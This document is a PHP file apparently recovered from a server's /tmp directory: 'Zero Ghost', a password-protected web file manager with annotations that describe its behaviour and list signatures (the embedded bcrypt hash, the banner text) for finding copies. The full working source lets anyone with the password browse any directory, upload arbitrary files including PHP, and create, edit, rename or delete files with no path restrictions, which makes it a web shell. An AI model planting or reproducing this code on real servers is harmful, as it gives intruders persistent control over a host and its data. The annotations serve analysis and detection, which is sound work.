File: //tmp/2655a641b09603edc99b3bd8b23e5fa7.php
<?php
// Review note: access gate for the file manager that follows. Every later
// statement is reached only once $_SESSION['logged_in'] has been set below.
session_start();
// CHANGE this hash to match your password (this is the hash of 'rahasia123')
// Review note: the credential is a bcrypt hash embedded in the file, and the
// author's comment above names the plaintext it was generated from. The literal
// hash string is a stable value to search for when hunting copies of this file.
$hashed_password = '$2y$10$nXYXSvJ5Xl4KGP/17NYI5.0tc2DX11iGpibNIcMs20KNCMdco/Vzu';
// Logout
// Review note: any GET request carrying ?logout destroys the session and
// redirects back to this same script.
if (isset($_GET['logout'])) {
session_destroy();
header("Location: " . $_SERVER['PHP_SELF']);
exit;
}
// Check login
if (!isset($_SESSION['logged_in'])) {
// Review note: one shared password checked with password_verify(). The code
// shows no attempt limit, no delay, and no session_regenerate_id() on success.
if (isset($_POST['pass']) && password_verify($_POST['pass'], $hashed_password)) {
$_SESSION['logged_in'] = true;
header("Location: " . $_SERVER['PHP_SELF']);
exit;
}
// Login form
// Review note: unauthenticated visitors get only this bare form (one password
// field named "pass"), then the script stops.
echo '<form method="POST">';
echo '<input type="password" name="pass" placeholder="Enter Password">';
echo '<input type="submit" value="Login">';
echo '</form>';
exit;
}
// Review note: error reporting is switched off from here on, so failures of the
// filesystem calls below are not reported through PHP's error output.
error_reporting(0);
// Review note: the working directory is taken directly from the "dir" query
// parameter. There is no realpath() or base-directory check, so any directory
// the PHP process may enter can be selected. The result of chdir() is not
// checked; if it fails, the script keeps its previous working directory.
$dir = isset($_GET['dir']) ? $_GET['dir'] : getcwd();
chdir($dir);
// Entries of whichever directory is now current; scandir() returns false on
// failure and the later foreach over $files does not guard against that.
$files = scandir(".");
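/**
 * Escape a value for inclusion in HTML text or a quoted attribute.
 *
 * The flags are passed explicitly because htmlspecialchars() left single
 * quotes unescaped by default before PHP 8.1, and this file calls h() inside
 * a single-quoted attribute (the rename form's value='...'). The cast keeps
 * false/null inputs (e.g. a failed file read) rendering as an empty string.
 *
 * @param mixed $s Value to escape; converted to string first.
 * @return string The escaped string.
 */
function h($s) {
    return htmlspecialchars((string) $s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}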
/**
 * Tell whether a path is an existing regular file that this script treats as
 * editable text: either one of a few fixed dotfile names or a file whose
 * extension is on a short list. The comparison is case-sensitive.
 *
 * The file listing in this script uses the result only to decide whether to
 * print an "Edit" link.
 *
 * @param string $file Path to test.
 * @return bool True when the path is a regular file with a listed name or extension.
 */
function isText($file) {
    // Anything that is not a regular file is rejected; warnings stay suppressed.
    if (!@is_file($file)) {
        return false;
    }

    $name = basename($file);
    if (in_array($name, ['.htaccess', '.env', '.gitignore'], true)) {
        return true;
    }

    $suffix = pathinfo($name, PATHINFO_EXTENSION);

    return in_array($suffix, ['php', 'txt', 'html', 'css', 'js', 'json', 'env'], true);
}
// Upload
// Review note: any request that carries a file part is accepted. The
// destination is the client-supplied file name, resolved against the current
// working directory, with no check on extension, type or size. The return
// value of move_uploaded_file() is ignored, so the "Uploaded" line is printed
// whether or not the file was stored.
if ($_FILES) {
move_uploaded_file($_FILES['file']['tmp_name'], $_FILES['file']['name']);
echo "<p>✅ Uploaded: " . h($_FILES['file']['name']) . "</p>";
}
// Create folder
// Review note: basename() strips directory components from the requested name,
// so the folder is created in the current working directory. $folderName is
// interpolated into the response without h(), unlike the upload message above.
if (isset($_POST['createfolder']) && !empty($_POST['newfolder'])) {
$folderName = basename($_POST['newfolder']);
if (!is_dir($folderName)) {
mkdir($folderName);
echo "<p>✅ Folder '$folderName' berhasil dibuat</p>";
} else {
echo "<p>⚠️ Folder sudah ada</p>";
}
}
// Header and navigation
// Review note: the banner text printed here is a fixed string in the response
// body and can serve as a content signature for this file manager.
echo "<h2>🗂️ Zero Ghost</h2>";
echo "<p>📁 Current Directory: " . h(getcwd()) . "</p>";
echo '<p><a href="?logout=1">🔒 Logout</a></p>';
// Upload form
echo '<form enctype="multipart/form-data" method="POST">';
echo '<input type="file" name="file">';
echo '<input type="submit" value="Upload">';
echo '</form>';
// Create-folder form
echo '<form method="POST" style="margin-top:10px;">';
echo '<input type="text" name="newfolder" placeholder="Folder Name">';
echo '<input type="submit" name="createfolder" value="Create Folder">';
echo '</form>';
echo "<hr>";
// Create-file form: posts "filename", "filecontent" and "createfile".
echo "<h3>➕ Create New File</h3>";
echo "<form method='POST'>";
echo "<input type='text' name='filename' placeholder='example.php' required>";
echo "<br><br>";
echo "<textarea name='filecontent' rows='10' cols='100' placeholder='Isi file...'></textarea>";
echo "<br><br>";
echo "<input type='submit' name='createfile' value='Create File'>";
echo "</form>";
// List file/folder
// Review note: every entry except "." is listed, so ".." stays available and
// its Open link leads to the parent directory. Entry names are printed without
// h(); only the values placed in the links are urlencode()d.
echo "<ul>";
foreach ($files as $file) {
if ($file == ".") continue;
$path = getcwd() . "/" . $file;
$urlDir = urlencode(getcwd());
$urlFile = urlencode($file);
echo "<li>$file ";
if (is_dir($file)) {
echo "[<a href='?dir=" . urlencode(realpath($path)) . "'>Open</a>]";
}
// isText() only decides whether the Edit link is shown.
if (isText($file)) {
echo "[<a href='?edit=$urlFile&dir=$urlDir'>Edit</a>]";
}
// Delete and rename are plain GET links carrying ?delete= / ?rename= plus ?dir=.
echo " [<a href='?delete=$urlFile&dir=$urlDir' onclick='return confirm(\"Hapus?\")'>Delete</a>]";
echo " [<a href='?rename=$urlFile&dir=$urlDir'>Rename</a>]";
echo "</li>";
}
echo "</ul>";
// Delete
// Review note: the target path is the "dir" and "delete" query parameters
// joined by a slash, with no normalisation or base-directory check. The action
// is triggered by a GET request and carries no anti-CSRF token. The listing has
// already been echoed earlier in the script, so the header() redirect below may
// not be sent unless output buffering is enabled (TODO confirm on the host).
if (isset($_GET['delete'])) {
$target = $_GET['dir'] . '/' . $_GET['delete'];
if (is_file($target)) {
unlink($target);
} elseif (is_dir($target)) {
rmdir($target);
}
header("Location: ?dir=" . urlencode($_GET['dir']));
exit;
}
// Edit
// Review note: on POST the submitted "content" is written to the path built
// from "dir" and "edit". isText() is not consulted here, so the extension list
// does not restrict which file is overwritten. The current content is then read
// back (warnings suppressed) and shown escaped inside the textarea.
if (isset($_GET['edit'])) {
$file = $_GET['dir'] . '/' . $_GET['edit'];
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
file_put_contents($file, $_POST['content']);
echo "<p>✅ Disimpan</p>";
}
$content = @file_get_contents($file);
echo "<form method='POST'>";
echo "<textarea name='content' rows='20' cols='100'>" . h($content) . "</textarea><br>";
echo "<input type='submit' value='Save'>";
echo "</form>";
exit;
}
// Rename
// Review note: "newname" is appended to "dir" without basename(), so the new
// path may contain directory components and the operation can move a file as
// well as rename it. The value attribute below is single-quoted, so its
// escaping depends on how h() treats single quotes.
if (isset($_GET['rename'])) {
$old = $_GET['dir'] . '/' . $_GET['rename'];
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
$new = $_GET['dir'] . '/' . $_POST['newname'];
rename($old, $new);
header("Location: ?dir=" . urlencode($_GET['dir']));
exit;
}
echo "<form method='POST'>";
echo "Rename to: <input name='newname' value='" . h(basename($old)) . "'>";
echo "<input type='submit' value='Rename'>";
echo "</form>";
exit;
}
// Create
// Review note: basename() confines the new file to the current working
// directory and an existing file is not overwritten. The posted content is
// written as-is.
if (isset($_POST['createfile'])) {
$filename = basename($_POST['filename']);
$content = $_POST['filecontent'];
$path = getcwd() . '/' . $filename;
if (file_exists($path)) {
echo "<p>⚠️ File sudah ada</p>";
} else {
if (file_put_contents($path, $content) !== false) {
echo "<p>✅ File berhasil dibuat: " . h($filename) . "</p>";
} else {
echo "<p>❌ Gagal membuat file</p>";
}
}
}
// Review note: this extension check runs after the write above has already
// happened, so it only affects the message shown and never blocks a file from
// being created; the list includes "php" in any case. $filename is undefined
// when no create-file form was posted (the resulting warning is hidden by
// error_reporting(0)). The top-level return ends the script.
$allow = ['php','txt','html','css','js'];
$ext = pathinfo($filename, PATHINFO_EXTENSION);
if (!in_array($ext, $allow)) {
echo "<p>❌ Ekstensi tidak diizinkan</p>";
return;
}
?>